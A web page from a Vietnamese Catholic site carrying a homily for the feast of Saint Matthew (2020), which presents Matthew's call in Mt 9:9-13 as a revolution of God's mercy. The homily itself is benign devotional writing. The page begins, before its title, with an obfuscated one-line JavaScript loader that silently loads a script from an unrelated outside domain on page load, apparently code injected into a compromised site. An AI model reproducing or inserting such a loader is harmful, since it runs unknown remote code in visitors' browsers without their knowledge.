;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ƠN GỌI CỦA THÁNH MATTHÊU, CUỘC CÁCH MẠNG CỦA LÒNG THƯƠNG XÓT – Xitô PS

ƠN GỌI CỦA THÁNH MATTHÊU, CUỘC CÁCH MẠNG CỦA LÒNG THƯƠNG XÓT

Lễ thánh Matthêu 21/09/2020

ƠN GỌI CỦA MATTHÊU,

CUỘC CÁCH MẠNG CỦA LÒNG THƯƠNG XÓT

(Ep 4, 1-7.11-13; Mt 9, 9-13)

Mọi ơn gọi xuất phát từ Thiên Chúa, và ơn gọi nào cũng là một cuộc cách mạng của lòng thương xót, Thiên Chúa thực hiện nơi mỗi người. Tuy nhiên, nơi thánh Matthêu có điều gì đó rất đặc biệt. Vậy chúng ta cùng khám phá chút ít về ơn gọi của Matthêu, để củng cố ơn gọi  của chúng ta.

Matthêu sống bằng nghề được so sánh, sánh ví ngang hàng với quân tội lỗi và đĩ điếm, đó là nghề thu thuế. Một nghề tiếp tay với ngoại bang bóc lột dân chúng, nên người Do thái khinh bỉ và khai trừ, dứt phép thông công những ai làm nghề này. Như thế, Matthêu thuộc vào hàng tội đồ của dân tộc Do thái, và là đồ bỏ đi. Vậy mà khi đi ngang qua trạm thu thuế, Đức Giê su thấy ông và cất tiếng gọi: “anh hãy theo tôi. Và ông đứng dậy đi theo Người”.

Hành động Đức Giê su chọn Matthêu quả thực là một cuộc cách mạng. Cuộc cách mạng này không nhằm lật đổ một chế độ, nhưng là hoán cải một con người, phục hồi phẩm giá cao trọng cho Matthêu. Đức Giê su đã chọn một người mà bậc đạo đức là giới kinh sư và người Pharisêu loại trừ và coi là đồ ô uế, đáng nguyền rủa. Nhưng Ngài đã chọn và chữa lành Matthêu. Đức Giê su chữa bằng cách nào? Thứ nhất Ngài gọi ông theo mình: “anh hãy theo tôi”; kế đến, Ngài sẵn lòng đồng bàn với họ, như Tin mừng viết: “ khi Đức Giê su dùng bữa tại nhà ông ấy, có nhiều người thu thuế và người tội lỗi kéo đến, cùng ăn với người và các môn đệ”. Hơn nữa, Ngài ví mình như một vị lương y đến để cứu chữa những gì đã hư mất: “vì tôi đến không để kêu gọi người công chính, mà kêu gọi người tội lỗi”.  

Câu: “Người khỏe mạnh không cần đến thầy thuốc, người đau ốm mới cần”. Người bệnh cần đến thầy thuốc thế nào, thì thầy thuốc cũng cần một điều rất quan trọng nơi bệnh nhân đó là lòng tin. Chúa Giê su gọi và Matthêu đã đứng dậy đi theo Người. Hành động đứng dậy và đi theo Đức Giê su của thánh Matthêu vén mở cho chúng ta thấy, trước hết: Thiên Chúa yêu con người bất chấp họ có tội lỗi như thế nào; thứ đến, dù con người ta có tội lỗi thế nào, có dã tâm ác độc thế nào thì lòng nhân và mầm khát vọng thánh thiện vẫn còn trong họ. Quả thực lòng nhân ấy ở nơi Matthêu- một người bị coi như tội đồ của dân tộc- nhưng chưa hề mất. Khát vọng nên hoàn thiện vẫn có nơi Matthêu, bởi ông cũng là con cháu tổ phụ Apraham. Khát vọng ấy, đã được Đức Giê su đánh thức, khi Ngài quyết định chọn và gọi ông làm tông đồ và đặt ông làm chứng nhân cho mầu nhiệm tử nạn và phục sinh của Người.

Kể từ ngày Matthêu đi theo tiếng gọi của Đức Giê su, thánh nhân đã luôn cố gắng: “sống xứng với ơn kêu gọi mà Thiên Chúa đã ban” cho ông, để mỗi ngày: “đạt tới sự nhận biết Con Thiên Chúa, tới tình trạng con người trưởng thành, tới tầm vóc viên mãn trong Đức Ki tô”. Thánh nhân đã đạt được ơn cao trọng ấy trong sự vinh thắng của Đức Ki tô và hiển trị với Ngài.

Ơn gọi của thánh Matthêu là một cuộc cách mạng của lòng thương xót Thiên Chúa trong Đức Ki tô. Thế nên,  cuộc đời và ơn gọi của thánh Matthêu, thật sự là niềm hy vọng của tất cả chúng ta. Bởi vậy, dù hiện tại chúng ta đang như thế nào, có chán trường, có bất mãn bất mãn với ai đó và không được như ai kia. Điều đó không quan trọng, quan trọng hơn cả chúng ta có dám trao cho Đức Ki tô cơ hội thực hiện cuộc cách lòng thương xót trên cuộc đời và trên ơn gọi của ta hay không. Dù có thế nào, hãy nhớ lại điểm xuất phát khi Thiên Chúa gọi chúng ta theo Ngài; Hãy nhớ lại quyền năng Thiên Chúa đã thực hiện trên cuộc đời của Matthêu mà vững tin tiến bước theo Đức Ki tô đến cùng trong ơn gọi và sứ vụ Thiên Chúa đang dành cho mỗi người trong ta, dù đau dù bệnh tật tất cả chúng ta đều có chung sứ mạng tôn thờ Thiên Chúa và trao yêu thương cho mọi người. Bởi vậy, hãy tin tưởng, can đảm tiến bước  theo Đức Ki tô. Và nhất là hãy trao cho Đức Ki tô cơ hội được chữa lành chúng ta mỗi ngày. Và chúng  ta cũng sẽ tỏa sáng hơn trong đức ái, trong ơn gọi tông đồ của Tin mừng.

Xin Chúa chúc lành và gìn giữ chúng ta trong bình an của Ngài.

FM. Tùy Phúc Hậu

You May Also Like

Trả lời

X